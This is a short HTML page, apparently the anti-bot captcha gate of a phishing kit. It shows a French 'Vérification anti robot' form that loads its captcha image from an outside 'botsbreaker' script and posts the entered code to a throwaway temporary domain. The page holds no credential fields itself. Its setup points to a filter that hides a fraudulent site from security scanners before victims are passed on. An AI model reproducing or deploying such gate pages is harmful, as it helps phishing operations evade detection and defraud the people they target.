<html>

 <style>
       body {
	font-family: arial;
    
    font-size: 0.95em;
    color: #232323;
   width: 50%;
   margin-left: auto;
    margin-right: auto;
}
.demo-error {
	color:#FF0000;
    font-size: 0.95em;
}
.demo-input {
    width: 100%;
    border-radius: 5px;
    border: #CCC 1px solid;
    padding: 12px;
    margin-top: 5px;
}
.demo-btn {
	    padding: 12px;
    border-radius: 5px;
    background: #0070ba;
    border: #284828 1px solid;
    color: #FFF;
    width: 100%;
    cursor: pointer;
    margin-top: 4px;
}
.demo-table {
    border-radius: 3px;
    padding: 10px;
    border: #E0E0E0 1px solid;
}
.demo-success {
    margin-top: 5px;
    color: #478347;
    background: #e2ead1;
    padding: 10px;
    border-radius: 5px;
}
.captcha-input {
	background: #FFF url(https://verifnoubilo.fr/botsbreaker/captchaImageSource.php) repeat-y left center;
    padding-left: 85px;
}

.center {
  display: block;
  margin-left: auto;
  margin-right: auto;
  width: 50%;
}
    </style>

<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
     <meta name="viewport" content="width=device-width">
<title>Vérification anti robot</title>
</head>
<body><center>
    <h2>Vérification anti robot</h2>
    <form name="frmContact" method="post" action="http://shanwazghu.temp.swtest.ru/">
       
                Code : <span id="error-captcha" class="demo-error"></span>
				<br></br>
                    <input name="captcha_code" type="text" required="" class="demo-input captcha-input">
                
                <br> <input type="submit" name="submit" value="Continuer" class="demo-btn">
            
        
</form>
</center>

</body></html>
